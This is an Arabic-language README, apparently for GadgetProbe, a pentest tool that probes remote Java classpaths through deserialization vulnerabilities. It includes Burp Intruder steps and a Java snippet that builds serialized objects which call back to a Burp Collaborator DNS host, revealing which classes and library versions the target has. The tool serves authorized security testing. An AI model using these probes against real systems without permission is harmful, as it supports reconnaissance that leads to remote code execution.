
افحص نقاط النهاية التي تستهلك كائنات Java المتسلسلة لتحديد الكلاسات والمكتبات وإصدارات المكتبات على مسارات classpath البعيدة في Java.
لقد وجدت للتو ثغرة في إلغاء تسلسل Java، وشغّلت جميع حمولات ysoserial، و... لم تحصل على شيء. ماذا الآن؟ كيف يمكنك تنقيح أو بناء سلسلة أدوات (gadget chain) وأنت في ظلام دامس؟
نقدم لك GadgetProbe، أداة تسلط الضوء على مسارات الفئات البعيدة وترفع مستوى خطورة الثغرات للجميع!
تأخذ GadgetProbe قائمة كلمات من فئات Java، وتنتج كائنات استدعاء DNS متسلسلة، وتكشف ما هو مختبئ في مسار الفئات البعيد.
يتكامل امتداد Burp تلقائيًا مع Burp Collaborator للتعامل مع عمليات استدعاء DNS. يتضمن الامتداد أيضًا تواقيع ومحللًا لتحديد إصدارات المكتبات من المصادر الشائعة للأدوات.
حمّل الإصدار أو اتبع تعليمات البناء أدناه.
بعد تحميل إضافة Burp:

2. أضف قائمة من فئات Java (انظر قوائم الكلمات المرفقة)

3. أضف معالج حمولات GadgetProbe، وأي معالجات أخرى مطلوبة في سلسلتك (على سبيل المثال، ترميز Base64).

4. شغّل هجوم intruder وشاهد النتائج تعود في تبويب GadgetProbe في Burp.

يمكن أيضًا استخدام GadgetProbe كمكتبة Java أو واجهة سطر أوامر (CLI) لهجمات متخصصة.
import com.bishopfox.gadgetprobe.GadgetProbe
...
// Call the GadgetProbe constructor with your authoritative nameserver (or use Burp collaborator).
GadgetProbe gp = new GadgetProbe("dnscallback.burpcollaborator.net");
// The crafted object "obj" is now ready to be sent using any custom implementation :)
Object obj = gp.getObject("org.apache.commons.collections.functors.invokertransformer");
# Build JAR (run first)
./gradlew shadowJar
# Build wordlists
./generate_wordlists.sh
اطّلع على الشرح الكامل على مدونة Bishop Fox.
Twitter: @theBumbleSec
GitHub: the-bumble